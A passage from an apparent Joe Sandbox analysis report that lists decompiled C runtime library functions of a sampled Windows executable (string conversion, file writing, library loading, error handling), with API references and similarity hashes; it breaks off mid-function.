        • __alloca_probe_16.LIBCMT ref: 00AB6ED3
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AB6F24
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AB6F36
        • __freea.LIBCMT ref: 00AB6F3F
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
        • String ID: ]iL
        • API String ID: 313313983-4085116960
        • Opcode ID: e82b57a51d2119ff523c7831b94055f3f3ceeb8f332dd6508494e7d8ee4b1603
        • Instruction ID: 78469a0cef44c8f56182e8b3dd55497a7283d6760a51c567aa092d7df6090c70
        • Opcode Fuzzy Hash: e82b57a51d2119ff523c7831b94055f3f3ceeb8f332dd6508494e7d8ee4b1603
        • Instruction Fuzzy Hash: DB31BD32A1020AABDB249F74EC45EFE7BA9EF40310F044129FC05D6252EB39CD51CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB3E82 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AB3E77,00000003,?,00AB3E17,00000003,00AC1DE8,0000000C,00AB3F2A,00000003,00000002), ref: 00AB3EA2
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB3EB5
        • FreeLibrary.KERNEL32(00000000,?,?,?,00AB3E77,00000003,?,00AB3E17,00000003,00AC1DE8,0000000C,00AB3F2A,00000003,00000002,00000000), ref: 00AB3ED8
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: ]iL$CorExitProcess$mscoree.dll
        • API String ID: 4061214504-3098782845
        • Opcode ID: 19e9a03ac136d47b53d3df79c99b8db0616c0195f725fb1f4e14c661886e180e
        • Instruction ID: 979111af1f75f3d913a794bcbbfe920a08ee2e10651d704b5160e5b4f0c1510d
        • Opcode Fuzzy Hash: 19e9a03ac136d47b53d3df79c99b8db0616c0195f725fb1f4e14c661886e180e
        • Instruction Fuzzy Hash: 60F04F31A0020DBBCB15AB95DD09BDEBFBDEB44711F010169F80AA2162EB318A52DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB9D28 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E00AB9D28(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				void* _t129;

				_t62 =  *0xac3018; // 0x4c695d09
				_v8 = _t62 ^ _t128;
				_t110 = _a12;
				_v12 = _t110;
				_t124 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t124 >> 6;
						_t119 = (_t124 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0xac3f60 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E00ABA22B(_t124, 0, 0, 2);
									_t129 = _t129 + 0x10;
								}
								_t69 = E00AB98CD(_t107, _t119, __eflags, _t124);
								__eflags = _t69;
								if(_t69 == 0) {
									_t112 =  *((intOrPtr*)(0xac3f60 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										E00AB9943(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E00AB9B10(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E00AB9A22(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E00AB96AD(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E00AB29BB(_v8 ^ _t128);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0xac3f60 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00AB501F())) = 0x1c;
												_t81 = E00AB500C();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t126 = 5;
										__eflags = _t77 - _t126;
										if(_t77 != _t126) {
											_t81 = E00AB4FE9(_t77);
										} else {
											 *((intOrPtr*)(E00AB501F())) = 9;
											 *(E00AB500C()) = _t126;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									E00AB9860( &_v24, _t121, _v12);
									goto L15;
								}
							}
							 *(E00AB500C()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00AB501F())) = 0x16;
							_t81 = E00AB4F63();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00AB500C()) =  *_t99 & _t121;
					 *((intOrPtr*)(E00AB501F())) = 0x16;
					E00AB4F63();
					goto L41;
				}
				goto L41;
			}





































        0x00ab9d30
        0x00ab9d37
        0x00ab9d3a
        0x00ab9d3d
        0x00ab9d41
        0x00ab9d45
        0x00ab9d48
        0x00ab9d4d
        0x00ab9d56
        0x00ab9d58
        0x00ab9d79
        0x00ab9d7e
        0x00ab9d84
        0x00ab9d87
        0x00ab9d8a
        0x00ab9d91
        0x00ab9d94
        0x00ab9d97
        0x00ab9d9b
        0x00ab9d9e
        0x00ab9da5
        0x00ab9da7
        0x00ab9da9
        0x00ab9dab
        0x00ab9dca
        0x00ab9dcd
        0x00ab9dcd
        0x00ab9dd2
        0x00ab9ddb
        0x00ab9de0
        0x00ab9de0
        0x00ab9de4
        0x00ab9dea
        0x00ab9dec
        0x00ab9e2a
        0x00ab9e31
        0x00ab9e34
        0x00ab9e39
        0x00ab9e88
        0x00ab9e8b
        0x00ab9e8e
        0x00ab9e9a
        0x00ab9ea0
        0x00ab9ea2
        0x00ab9eaa
        0x00ab9eaa
        0x00000000
        0x00ab9ead
        0x00ab9e3e
        0x00ab9e3e
        0x00ab9e41
        0x00ab9e7a
        0x00000000
        0x00ab9e7a
        0x00ab9e43
        0x00ab9e43
        0x00ab9e46
        0x00ab9e6a
        0x00000000
        0x00ab9e6a
        0x00ab9e48
        0x00ab9e4b
        0x00000000
        0x00000000
        0x00ab9e5a
        0x00000000
        0x00ab9dee
        0x00ab9dee
        0x00ab9df0
        0x00ab9e1d
        0x00ab9e22
        0x00ab9e0d
        0x00ab9eb0
        0x00ab9eb3
        0x00ab9eb4
        0x00ab9eb5
        0x00ab9eb6
        0x00ab9eb9
        0x00ab9ebb
        0x00ab9f20
        0x00ab9f23
        0x00ab9f24
        0x00ab9f33
        0x00ab9f33
        0x00ab9ebd
        0x00ab9ec0
        0x00ab9ec2
        0x00ab9ee8
        0x00ab9eeb
        0x00ab9eee
        0x00ab9ef1
        0x00ab9ef8
        0x00ab9efd
        0x00ab9f08
        0x00ab9f0d
        0x00ab9f13
        0x00ab9f18
        0x00ab9f18
        0x00ab9f1b
        0x00000000
        0x00ab9f1b
        0x00ab9eff
        0x00ab9f02
        0x00000000
        0x00000000
        0x00000000
        0x00ab9f04
        0x00ab9ec6
        0x00ab9ec7
        0x00ab9ec9
        0x00ab9ee0
        0x00ab9ecb
        0x00ab9ed0
        0x00ab9edb
        0x00ab9edb
        0x00000000
        0x00ab9ec9
        0x00ab9df4
        0x00ab9df7
        0x00000000
        0x00000000
        0x00ab9e05
        0x00000000
        0x00ab9e0a
        0x00ab9dec
        0x00ab9db2
        0x00ab9dba
        0x00ab9dc0
        0x00000000
        0x00ab9dc0
        0x00ab9da0
        0x00ab9da3
        0x00000000
        0x00000000
        0x00000000
        0x00ab9da3
        0x00ab9d5f
        0x00ab9d66
        0x00ab9d6c
        0x00000000
        0x00ab9d71
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL
        • API String ID: 0-4085116960
        • Opcode ID: c85bad27c3f82941b0e8200cddfec9ce43876a2e03ad6aba658ebe3e31b52ccb
        • Instruction ID: e0d9bfa0b663a1c242ad2219aeef55133c0ab3a6d446b9e2bcc600b0d1500c54
        • Opcode Fuzzy Hash: c85bad27c3f82941b0e8200cddfec9ce43876a2e03ad6aba658ebe3e31b52ccb
        • Instruction Fuzzy Hash: 52518B71D1020AABDB11EFB9C945BEFBBBCAF09320F140059F605A7293D7719A41DBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB42EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 83%
        			E00AB42EE(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xac3018; // 0x4c695d09
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00AB3CF6( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00AB3074(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00AB3074(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00AB3074(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00AB731C(_t56);
						_t40 = E00AB4676(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00AB731C(_t56);
						E00AB4676(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xac3018;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























        0x00ab42ee
        0x00ab42f8
        0x00ab42fc
        0x00ab42fe
        0x00ab4302
        0x00ab430c
        0x00ab431d
        0x00ab4322
        0x00ab4324
        0x00ab4326
        0x00ab4328
        0x00ab432a
        0x00ab432e
        0x00ab43e8
        0x00ab43f6
        0x00ab43f8
        0x00ab43fd
        0x00ab4404
        0x00ab4406
        0x00ab4414
        0x00ab4423
        0x00ab4426
        0x00ab4428
        0x00000000
        0x00ab4429
        0x00ab4336
        0x00ab433b
        0x00ab4340
        0x00ab4342
        0x00ab4342
        0x00ab4344
        0x00ab4349
        0x00ab434d
        0x00ab434d
        0x00ab4350
        0x00ab436f
        0x00ab436f
        0x00ab4371
        0x00ab4374
        0x00ab437d
        0x00ab4380
        0x00ab4385
        0x00ab4388
        0x00ab438d
        0x00000000
        0x00000000
        0x00ab438f
        0x00000000
        0x00ab4352
        0x00ab4352
        0x00ab4354
        0x00ab435d
        0x00ab4360
        0x00ab4365
        0x00ab4368
        0x00ab436d
        0x00ab4397
        0x00ab439a
        0x00ab439c
        0x00ab439f
        0x00ab43a7
        0x00ab43ad
        0x00ab43b4
        0x00ab43b6
        0x00ab43be
        0x00ab43cd
        0x00ab43d1
        0x00ab43d3
        0x00ab43d6
        0x00000000
        0x00000000
        0x00ab43d8
        0x00ab43db
        0x00ab43dd
        0x00ab43dd
        0x00ab43de
        0x00ab43e0
        0x00ab43e3
        0x00000000
        0x00ab43dd
        0x00000000
        0x00ab436d
        0x00ab4350
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL
        • API String ID: 0-4085116960
        • Opcode ID: f83643daba645c6221c957788f6522e7a0d305e4ebedc4b7b729c2db6fd3bfa2
        • Instruction ID: f27e821ee05486096f77c67556160ab1f50fdfeff465c72d21233ba27aa4724c
        • Opcode Fuzzy Hash: f83643daba645c6221c957788f6522e7a0d305e4ebedc4b7b729c2db6fd3bfa2
        • Instruction Fuzzy Hash: 5741A376A002049BCF24DF78C981A9DB7E9EF89714F154569E515EF393D731AE01CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB9B10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON
        Download Yara Rule
        C-Code - Quality: 91%
        			E00AB9B10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				short _v1716;
				char _v5132;
				intOrPtr _v5136;
				long _v5140;
				void* _v5144;
				int _v5148;
				signed int _t31;
				intOrPtr _t38;
				signed int* _t41;
				int _t45;
				int _t54;
				signed short* _t59;
				signed int _t65;
				signed int _t67;
				signed short* _t69;
				intOrPtr* _t72;
				intOrPtr _t74;
				signed int _t75;

				E00ABC1B0();
				_t31 =  *0xac3018; // 0x4c695d09
				_v8 = _t31 ^ _t75;
				_t54 = 0;
				_t72 = _a4;
				_t59 = _a12;
				_t69 = _t59;
				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x30));
				_t38 = _a16 + _t59;
				 *_t72 = 0;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				_v5136 = _t38;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				if(_t59 < _t38) {
					while(1) {
						L1:
						_t74 = _v5136;
						_t41 =  &_v1716;
						while(_t69 < _t74) {
							_t65 =  *_t69 & 0x0000ffff;
							_t69 =  &(_t69[1]);
							if(_t65 == 0xa) {
								_t67 = 0xd;
								 *_t41 = _t67;
								_t41 =  &(_t41[0]);
							}
							 *_t41 = _t65;
							_t41 =  &(_t41[0]);
							if(_t41 <  &_v12) {
								continue;
							}
							break;
						}
						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
						_t72 = _a4;
						_v5148 = _t45;
						if(_t45 == 0) {
							L11:
							 *_t72 = GetLastError();
						} else {
							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
								_t54 = _t54 + _v5140;
								_t45 = _v5148;
								if(_t54 < _t45) {
									continue;
								} else {
									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
									if(_t69 < _v5136) {
										_t54 = 0;
										goto L1;
									}
								}
								goto L12;
							}
							goto L11;
						}
						goto L12;
					}
				}
				L12:
				return E00AB29BB(_v8 ^ _t75);
			}























        0x00ab9b1a
        0x00ab9b1f
        0x00ab9b26
        0x00ab9b40
        0x00ab9b42
        0x00ab9b4a
        0x00ab9b4d
        0x00ab9b4f
        0x00ab9b58
        0x00ab9b5a
        0x00ab9b5c
        0x00ab9b5f
        0x00ab9b65
        0x00ab9b6a
        0x00ab9b70
        0x00ab9b70
        0x00ab9b70
        0x00ab9b76
        0x00ab9b7c
        0x00ab9b80
        0x00ab9b83
        0x00ab9b89
        0x00ab9b8d
        0x00ab9b8e
        0x00ab9b91
        0x00ab9b91
        0x00ab9b94
        0x00ab9b97
        0x00ab9b9f
        0x00000000
        0x00000000
        0x00000000
        0x00ab9b9f
        0x00ab9bc3
        0x00ab9bc9
        0x00ab9bcc
        0x00ab9bd4
        0x00ab9c22
        0x00ab9c28
        0x00ab9bd6
        0x00ab9bd6
        0x00ab9bfb
        0x00ab9c01
        0x00ab9c09
        0x00000000
        0x00ab9c0b
        0x00ab9c10
        0x00ab9c19
        0x00ab9c1b
        0x00000000
        0x00ab9c1b
        0x00ab9c19
        0x00000000
        0x00ab9c09
        0x00000000
        0x00ab9bd6
        0x00000000
        0x00ab9bd4
        0x00ab9b70
        0x00ab9c2a
        0x00ab9c3c

        APIs
        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,00AB9E6F,?,00000000,?), ref: 00AB9BC3
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00AB9E6F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9BF1
        • GetLastError.KERNEL32(?,00AB9E6F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9C22
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharErrorFileLastMultiWideWrite
        • String ID: ]iL
        • API String ID: 2456169464-4085116960
        • Opcode ID: d2dd44801dff05f3b67cd4dc3e51fde7733d07b1e696f8094642413328cf77da
        • Instruction ID: 96c90d60ce7e3afc71eb514ad10d7278c58a2a9d3bc1d92e354fbd4baa22e38c
        • Opcode Fuzzy Hash: d2dd44801dff05f3b67cd4dc3e51fde7733d07b1e696f8094642413328cf77da
        • Instruction Fuzzy Hash: 7B316175A002199FDB18DF59DC919EAB7B9EF08310F0445ADEA0AD7251D630AE81CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB62B8 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 95%
        			E00AB62B8(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xac3e88 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xabdd68 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x4c695d0a
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










        0x00ab62bd
        0x00ab62c1
        0x00ab62c8
        0x00ab62cc
        0x00ab62da
        0x00ab62f0
        0x00ab62f4
        0x00ab631d
        0x00ab631f
        0x00ab6323
        0x00ab6326
        0x00ab6326
        0x00ab632c
        0x00ab632e
        0x00000000
        0x00ab632f
        0x00ab62f6
        0x00ab62ff
        0x00ab630e
        0x00ab6301
        0x00ab6304
        0x00ab630a
        0x00ab630a
        0x00ab6312
        0x00000000
        0x00ab6314
        0x00ab6317
        0x00ab6319
        0x00000000
        0x00ab6319
        0x00ab6312
        0x00ab62ce
        0x00ab62d3
        0x00000000

        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue), ref: 00AB62EA
        • GetLastError.KERNEL32(?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue,00ABE238,00ABE240,00000000,00000364,?,00AB4D1C), ref: 00AB62F6
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AB625F,00000000,00000000,00000000,00000000,?,00AB64D0,00000006,FlsSetValue,00ABE238,00ABE240,00000000), ref: 00AB6304
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 77a16a289da485f1b61992a8b3dac55f4561072b77d3d469469337f2684ffc41
        • Instruction ID: c2a4ebb920dce991560ae0e801a9394c2eb63feaab0b6c451f69b2a4567d6e55
        • Opcode Fuzzy Hash: 77a16a289da485f1b61992a8b3dac55f4561072b77d3d469469337f2684ffc41
        • Instruction Fuzzy Hash: 15012B32706332ABCB219FB8AC44AD63BDCAF057A0B210620FD0ADB152D724D812C7E0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB4C4A Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 72%
        			E00AB4C4A(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xac3044; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00AB479B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00AB64A9(_t25, _t36, __eflags,  *0xac3044, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00AB4ABC(_t25, _t31, 0xac4164);
							E00AB4676(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00AB4676();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00AB4758(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xac3044; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00AB479B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00AB64A9(_t27, _t37, __eflags,  *0xac3044, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00AB4ABC(_t27, _t32, 0xac4164);
									E00AB4676(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00AB4676();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00AB6453(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
